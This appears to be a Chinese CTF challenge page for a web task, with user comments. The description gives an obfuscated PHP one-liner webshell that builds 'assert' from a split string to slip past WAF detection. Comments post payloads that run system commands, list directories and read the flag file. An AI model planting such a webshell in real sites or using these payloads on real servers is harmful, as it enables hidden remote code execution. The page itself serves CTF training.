shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8723
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
谢特恒123 3月前

这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法

回复 2

kitniu 4月前

?s=system(dir),然后进入txt文件,flag{********}

回复 1

攻防小哥 4月前

flag{********}

回复 0

smartada 5月前

flag{****}

回复 0

十里故清云 5月前

?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用

回复 0

TS3Rrrr 5月前

大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别

回复 1
windfalls 2月前

这个提示很重要,免杀一句话木马,assert($_GET['s'])

回复 0

a6819772 7月前

为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问

回复 0
zhang 6月前

cat

回复 2

TIMEtime 8月前

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);

回复 0

Cra2yNoob 8月前

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 2

banfang 9月前

点击场景,然后将描述发给豆包

回复 2

WriteUp

image
harry

3 金币

评分(10)

解题动态

qn9301 攻破了该题 11小时前
wsx68696 攻破了该题 11小时前
atctf 攻破了该题 11小时前
lipingctf 攻破了该题 12小时前
cykai999 攻破了该题 16小时前
河马 攻破了该题 20小时前
jvfnvd.vl 攻破了该题 21小时前
xong_bai 攻破了该题 1天前
999哲111 攻破了该题 1天前
qianhuan 攻破了该题 1天前
15620346617 攻破了该题 2天前
3145145 攻破了该题 2天前
gc 攻破了该题 2天前
Warp 攻破了该题 2天前
bugku0521 攻破了该题 2天前
1606143712 攻破了该题 3天前
zrlht 攻破了该题 3天前
多米今天犯错了没 攻破了该题 3天前
kramin 攻破了该题 3天前
ciphercici 攻破了该题 3天前
问题反馈